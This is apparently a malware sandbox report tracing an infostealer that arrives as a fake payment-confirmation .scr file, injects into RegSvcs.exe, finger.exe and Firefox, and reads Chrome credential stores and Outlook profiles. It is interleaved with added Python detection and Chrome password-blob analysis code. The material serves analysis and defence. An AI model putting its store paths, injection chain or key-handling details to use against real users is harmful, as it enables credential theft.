Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe NtWriteVirtualMemory: Direct from: 0x774CFE36
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe NtRequestWaitReplyPort: Direct from: 0x756F8D92
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe NtQueryVolumeInformationFile: Direct from: 0x774CFFAE
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe NtNotifyChangeKey: Direct from: 0x774D0F92
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe NtQueryAttributesFile: Direct from: 0x774CFE7E
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe NtReadVirtualMemory: Direct from: 0x774CFEB2
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe NtSetTimer: Direct from: 0x774E98D5
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe NtSetInformationFile: Direct from: 0x774CFC5A
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe NtQuerySystemInformation: Direct from: 0x774CFDD2
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: NULL target: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe protection: execute and read and write
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe Section loaded: NULL target: C:\Windows\SysWOW64\finger.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\finger.exe Section loaded: NULL target: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe protection: read write
Source: C:\Windows\SysWOW64\finger.exe Section loaded: NULL target: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\finger.exe Section loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\finger.exe Section loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\finger.exe Thread APC queued: target process: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\HP9gbzNVWxqFR.exe Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
Source: C:\Windows\SysWOW64\finger.exe Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
Source: HP9gbzNVWxqFR.exe, 00000005.00000002.867090402.0000000000A90000.00000002.00000001.00040000.00000000.sdmp, HP9gbzNVWxqFR.exe, 00000005.00000000.372421975.0000000000A90000.00000002.00000001.00040000.00000000.sdmp, m0tdggs3TGEEG.exe, 00000007.00000000.401798037.0000000000950000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: HP9gbzNVWxqFR.exe, 00000005.00000002.867090402.0000000000A90000.00000002.00000001.00040000.00000000.sdmp, HP9gbzNVWxqFR.exe, 00000005.00000000.372421975.0000000000A90000.00000002.00000001.00040000.00000000.sdmp, m0tdggs3TGEEG.exe, 00000007.00000000.401798037.0000000000950000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: HP9gbzNVWxqFR.exe, 00000005.00000002.867090402.0000000000A90000.00000002.00000001.00040000.00000000.sdmp, HP9gbzNVWxqFR.exe, 00000005.00000000.372421975.0000000000A90000.00000002.00000001.00040000.00000000.sdmp, m0tdggs3TGEEG.exe, 00000007.00000000.401798037.0000000000950000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: !Progman
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Queries volume information: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\finger.exe Queries volume information: C:\Users\user\AppData\Local\Temp\jzmh-t.zip VolumeInformation
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E96BE0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 6_2_61E96BE0
Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.388663997.0000000000300000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.453623702.00000000002E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.867501837.0000000004FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.866945987.0000000000260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.388713331.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.866925656.00000000001C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.866906811.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.389129040.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.867129068.0000000003370000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\finger.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\finger.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\finger.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\finger.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\finger.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\finger.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
Source: C:\Windows\SysWOW64\finger.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
Source: C:\Windows\SysWOW64\finger.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
Source: C:\Windows\SysWOW64\finger.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
Source: C:\Windows\SysWOW64\finger.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
Source: C:\Windows\SysWOW64\finger.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
Source: C:\Windows\SysWOW64\finger.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
Source: C:\Windows\SysWOW64\finger.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
Source: C:\Windows\SysWOW64\finger.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
Source: C:\Windows\SysWOW64\finger.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
Source: C:\Windows\SysWOW64\finger.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
Source: C:\Windows\SysWOW64\finger.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\SysWOW64\finger.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\SysWOW64\finger.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\SysWOW64\finger.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\SysWOW64\finger.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
Source: C:\Windows\SysWOW64\finger.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
Source: C:\Windows\SysWOW64\finger.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
Source: C:\Windows\SysWOW64\finger.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
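Added example, not part of this report: triage logic over constructed event records that mirror the lines above, where finger.exe (a signed Windows binary living in SysWOW64) opens Chrome's Login Data and Local State and the Outlook MAPI profile keys. The event field names, the owner-process allowlist and the LOLBin list are assumptions made for the example; the paths and registry keys are the ones the report shows.

```python
"""Added example (not from the sandbox report): flag credential-store access
by processes that are not the store's owner, and escalate when the actor is a
signed Windows binary that has no business reading user data.
Event records below are constructed; their field names are an assumption."""
import re
from collections import defaultdict

# Credential stores of Chromium-based browsers under <profile>\User Data.
# "Local State" sits directly under User Data, the others under a profile dir.
BROWSER_STORES = re.compile(
    r"\\(Google\\Chrome|Chromium|Microsoft\\Edge)\\User Data\\(?:.*\\)?"
    r"(Login Data|Local State|Web Data|Cookies)$",
    re.IGNORECASE,
)
# MAPI profile root holding Outlook account settings (Outlook 2010-era layout,
# as seen in the report); the 9375CFF0... subkey is the per-account store.
MAPI_PROFILES = re.compile(
    r"^HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\"
    r"Windows Messaging Subsystem\\Profiles\\",
    re.IGNORECASE,
)
# Processes with a legitimate reason to read each store (assumed allowlist).
EXPECTED = {
    "browser": {"chrome.exe", "msedge.exe", "chromium.exe"},
    "mapi": {"outlook.exe"},
}
# Signed Windows binaries commonly used as injection hosts (assumed list).
LOLBINS = {"finger.exe", "regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}

# Constructed events mirroring the report; "op" is FileOpen or RegOpenKey.
EVENTS = [
    {"image": r"C:\Windows\SysWOW64\finger.exe", "op": "FileOpen",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"image": r"C:\Windows\SysWOW64\finger.exe", "op": "FileOpen",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State"},
    {"image": r"C:\Windows\SysWOW64\finger.exe", "op": "RegOpenKey",
     "target": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001"},
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "op": "FileOpen",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE", "op": "RegOpenKey",
     "target": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook"},
    {"image": r"C:\Windows\SysWOW64\finger.exe", "op": "FileOpen",
     "target": r"C:\Users\user\AppData\Local\Temp\jzmh-t.zip"},
]


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Tag one event, or return None when the actor is the store's owner."""
    proc = image_name(event["image"])
    target = event["target"]
    if BROWSER_STORES.search(target):
        return None if proc in EXPECTED["browser"] else "browser_credential_store_read"
    if MAPI_PROFILES.match(target):
        return None if proc in EXPECTED["mapi"] else "mapi_profile_read"
    return None


def triage(events):
    """Aggregate tags per process; a LOLBin actor is itself a finding."""
    findings = defaultdict(set)
    for ev in events:
        tag = classify(ev)
        if tag is None:
            continue
        proc = image_name(ev["image"])
        findings[proc].add(tag)
        if proc in LOLBINS:
            findings[proc].add("lolbin_actor")
    return {proc: sorted(tags) for proc, tags in findings.items()}


def severity(tags):
    """Browser plus mail store reads from one process is the infostealer pattern."""
    stores = {"browser_credential_store_read", "mapi_profile_read"} & set(tags)
    if len(stores) == 2 or ("lolbin_actor" in tags and stores):
        return "high"
    return "medium" if stores else "info"


if __name__ == "__main__":
    for proc, tags in triage(EVENTS).items():
        print(proc, severity(tags), tags)
```

Run stand-alone it reports finger.exe as high and stays silent on chrome.exe and OUTLOOK.EXE; the Temp zip access is ignored because the rule is deliberately scoped to credential stores, not to everything a LOLBin touches.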

Remote Access Functionality

Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.388663997.0000000000300000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.453623702.00000000002E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.867501837.0000000004FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.866945987.0000000000260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.388713331.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.866925656.00000000001C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.866906811.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.389129040.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.867129068.0000000003370000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E261C5 sqlite3_bind_double,sqlite3_mutex_leave, 6_2_61E261C5
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E2619E sqlite3_bind_text16, 6_2_61E2619E
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E26131 sqlite3_bind_text64, 6_2_61E26131
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E2610A sqlite3_bind_text, 6_2_61E2610A
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E260C3 sqlite3_bind_blob64, 6_2_61E260C3
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E2609C sqlite3_mutex_leave,sqlite3_bind_blob, 6_2_61E2609C
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E263CE sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob, 6_2_61E263CE
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E26361 sqlite3_bind_zeroblob,sqlite3_mutex_leave, 6_2_61E26361
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E03329 sqlite3_bind_parameter_name, 6_2_61E03329
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E03317 sqlite3_bind_parameter_count, 6_2_61E03317
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E262E4 sqlite3_bind_pointer,sqlite3_mutex_leave, 6_2_61E262E4
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E262B3 sqlite3_bind_null,sqlite3_mutex_leave, 6_2_61E262B3
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E2628D sqlite3_bind_int,sqlite3_bind_int64, 6_2_61E2628D
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E03240 sqlite3_value_frombind, 6_2_61E03240
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E2623E sqlite3_bind_int64,sqlite3_mutex_leave, 6_2_61E2623E
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E264B5 sqlite3_bind_zeroblob64,sqlite3_mutex_enter,sqlite3_bind_zeroblob,sqlite3_mutex_leave, 6_2_61E264B5
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E0A426 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave, 6_2_61E0A426
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E10C58 sqlite3_mutex_enter,sqlite3_mutex_leave,sqlite3_transfer_bindings, 6_2_61E10C58
Source: C:\Windows\SysWOW64\finger.exe Code function: 6_2_61E14E9B sqlite3_bind_parameter_index, 6_2_61E14E9B
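Added example, not part of this report: the sqlite3 functions listed above are what the payload inside finger.exe uses to query Chrome's Login Data, and the file accesses in the previous section show it also opening Local State. The block below builds a stand-in Login Data database in memory from constructed rows and classifies how each stored password is protected, which makes clear why the stealer needs both files. Blob layouts follow Chrome on Windows (a raw DPAPI blob for pre-Chrome-80 profiles; "v10" plus a 12-byte nonce, AES-256-GCM ciphertext and a 16-byte tag from Chrome 80 on, with the key stored DPAPI-wrapped under os_crypt.encrypted_key in Local State). The sample key, nonce, URLs and user names are dummies; nothing is decrypted.

```python
"""Added example (not from the sandbox report): what an embedded SQLite gets
out of Chrome's "Login Data" and why the stealer also reads "Local State".
Database rows, key and nonce bytes are constructed dummies."""
import base64
import json
import sqlite3

# DPAPI blob header: version 1 followed by the provider GUID
# {DF9D8CD0-1501-11D1-8C7A-00C04FC297EB} in little-endian field order.
DPAPI_MAGIC = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")
V10_NONCE_LEN, GCM_TAG_LEN = 12, 16

# Constructed records: nonce 00..0b, 24 bytes of "ciphertext", tag of 0x22 bytes.
SAMPLE_V10 = b"v10" + bytes(range(V10_NONCE_LEN)) + b"\x11" * 24 + b"\x22" * GCM_TAG_LEN
SAMPLE_DPAPI = DPAPI_MAGIC + b"\x00" * 40
SAMPLE_LOCAL_STATE = json.dumps({"os_crypt": {
    "encrypted_key": base64.b64encode(b"DPAPI" + DPAPI_MAGIC + b"\x00" * 16).decode()}})

# Artefacts an attacker running in the user's context must reach for each class.
REQUIRED_ARTIFACTS = {
    "aes_gcm_v10": ("Local State", "DPAPI"),
    "dpapi_blob": ("DPAPI",),
    "unknown": (),
}


def build_sample_db():
    """In-memory stand-in for Login Data with the columns a stealer selects."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE logins (origin_url TEXT, username_value TEXT, password_value BLOB)")
    db.executemany("INSERT INTO logins VALUES (?, ?, ?)", [
        ("https://mail.example.test", "alice", SAMPLE_V10),
        ("https://legacy.example.test", "bob", SAMPLE_DPAPI),
        ("https://other.example.test", "carol", b"v20" + b"\x00" * 40),  # newer scheme, left unparsed
    ])
    return db


def classify_blob(blob):
    """Identify the protection scheme from the blob prefix without decrypting."""
    if blob.startswith(b"v10") and len(blob) >= 3 + V10_NONCE_LEN + GCM_TAG_LEN:
        return "aes_gcm_v10"
    if blob.startswith(DPAPI_MAGIC):
        return "dpapi_blob"
    return "unknown"


def parse_v10(blob):
    """Split a v10 record into nonce, ciphertext and GCM tag (all still encrypted)."""
    body = blob[3:]
    return {"nonce": body[:V10_NONCE_LEN],
            "ciphertext": body[V10_NONCE_LEN:-GCM_TAG_LEN],
            "tag": body[-GCM_TAG_LEN:]}


def local_state_key_blob(local_state_json):
    """Return the DPAPI blob wrapping the AES key, or None if the prefix is absent."""
    raw = base64.b64decode(json.loads(local_state_json)["os_crypt"]["encrypted_key"])
    return raw[len(b"DPAPI"):] if raw.startswith(b"DPAPI") else None


def inventory(db):
    """One (url, user, scheme, artefacts needed) tuple per stored login."""
    rows = db.execute("SELECT origin_url, username_value, password_value FROM logins")
    return [(url, user, classify_blob(blob), REQUIRED_ARTIFACTS[classify_blob(blob)])
            for url, user, blob in rows]


if __name__ == "__main__":
    for row in inventory(build_sample_db()):
        print(*row)
```

Run stand-alone it prints one row per login. The v10 row is the case that forces the Local State read: without the DPAPI-wrapped key from that file the SQLite query alone yields only nonce, ciphertext and tag. The "v20" row is kept as a reminder that a classifier keyed on prefixes must treat anything it does not recognise as unknown rather than as plaintext.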